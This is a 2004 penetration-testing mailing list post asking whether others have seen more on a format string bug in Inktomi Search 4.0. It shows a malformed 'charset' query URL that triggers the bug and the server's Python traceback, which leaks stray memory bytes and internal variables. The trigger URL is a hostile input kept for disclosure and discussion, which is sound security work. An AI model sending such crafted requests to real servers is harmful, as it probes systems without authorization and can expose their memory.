Home page logo
/

pen-test logo Penetration Testing mailing list archives

Format String vuln in Inktomi Search4.0
From: "Blurred Vision" <really_blurred_vision () hotmail com>
Date: Fri, 27 Feb 2004 08:17:54 +1100

Besides the discussion found here:
http://lists.virus.org/dw-0day-0306/msg00071.html

Which confirms the existance of a format string bug, has anyone seen anymore on the following FS bug in inktomi search?

URL:    http://<vuln_inktomisearch_server>/query.html?charset=%3

Internal Server Error
Server cannot complete operation
exceptions.UnicodeError: unknown encoding 0'<meta htPk k u': ', u'Server cannot complete operati
 File httpsrvr.py, line 501, in parse_qs
charset = "0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot comple enclst = [('charset', ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server
   ent = ['charset', '%3']
   idx = 0
   key = 'charset'
lst = ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot complete
   nodecode = []
   qs = 'charset=%3'
query = {'charset': ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server ca
   self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
val = "0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot complete o
 File httpsrvr.py, line 778, in handle
   frag = ''
   netloc = '<vuln_inktomisearch_server>'
   parms = ''
   path = '/query.html'
   qs = 'charset=%3'
query = {'charset': ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server ca
   req = ''
   scheme = 'http'
   self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
   server = <httpsrvr.Server ('XXX.XXX.XXX.XXX', 80)>
   thr = 413
 File httpsrvr.py, line 904, in __init__
   client_address = ('XXX.XXX.XXX.XXX', 56730)
   sckt = <socket._socketobject instance at 21957c0>
   self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
   server = <httpsrvr.Server ('XXX.XXX.XXX.XXX', 80)>

_________________________________________________________________
Hot chart ringtones and polyphonics. Go to http://ninemsn.com.au/mobilemania/default.asp


---------------------------------------------------------------------------
----------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
  • Format String vuln in Inktomi Search4.0 Blurred Vision (Feb 27)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]